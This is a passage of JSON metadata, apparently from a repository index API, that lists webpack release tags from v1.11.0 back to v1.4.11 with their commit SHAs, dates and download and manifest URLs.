11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/